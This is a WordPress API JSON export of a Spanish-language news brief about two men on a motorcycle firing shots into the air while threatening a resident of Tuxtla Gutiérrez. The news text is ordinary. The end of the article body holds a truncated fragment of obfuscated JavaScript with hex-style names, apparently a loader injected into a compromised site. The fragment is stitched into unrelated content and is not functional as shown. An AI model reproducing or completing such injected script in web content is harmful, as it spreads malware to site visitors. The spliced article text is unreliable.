{"id":5491,"date":"2022-09-29T01:45:23","date_gmt":"2022-09-29T01:45:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5491"},"modified":"2022-09-29T01:45:24","modified_gmt":"2022-09-29T01:45:24","slug":"sujetos-disparan-al-aire-en-la-colonia-27-de-febrero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5491","title":{"rendered":"Sujetos disparan al aire en la Colonia 27 de febrero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0022-768x1024.jpg\" alt=\"\" class=\"wp-image-5492\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0022-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0022-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220928-WA0022.jpg 780w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde, dos sujetos a bordo de una motocicleta amagaron a un sujeto y realizaron disparos al aire en la Colonia 27 de Febrero.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 en la Calle Emiliano Zapata y Julio C\u00e9sar Ruiz Ferro cuando Francisco Javier se encontraba en la banqueta de su domicilio y arribaron los sujetos abordo de una motocicleta negra.<\/p>\n\n\n\n<p>Los sujetos le preguntaron por el paradero de su hermano y al no dar raz\u00f3n dispararon al aire en dos ocasiones.<\/p>\n\n\n\n<p>Inmediatamente los agresores escaparon con rumbo desconocido.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de la polic\u00eda para verificar la situaci\u00f3n pero no obtuvieron m\u00e1s detalles.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 28 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde, dos sujetos a bordo de una motocicleta amagaron a un sujeto y realizaron disparos al aire en la Colonia 27 de Febrero. De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 en la Calle Emiliano Zapata y Julio C\u00e9sar &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5492,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5491","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5491","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5491"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5491\/revisions"}],"predecessor-version":[{"id":5493,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5491\/revisions\/5493"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5492"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5491"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5491"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5491"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}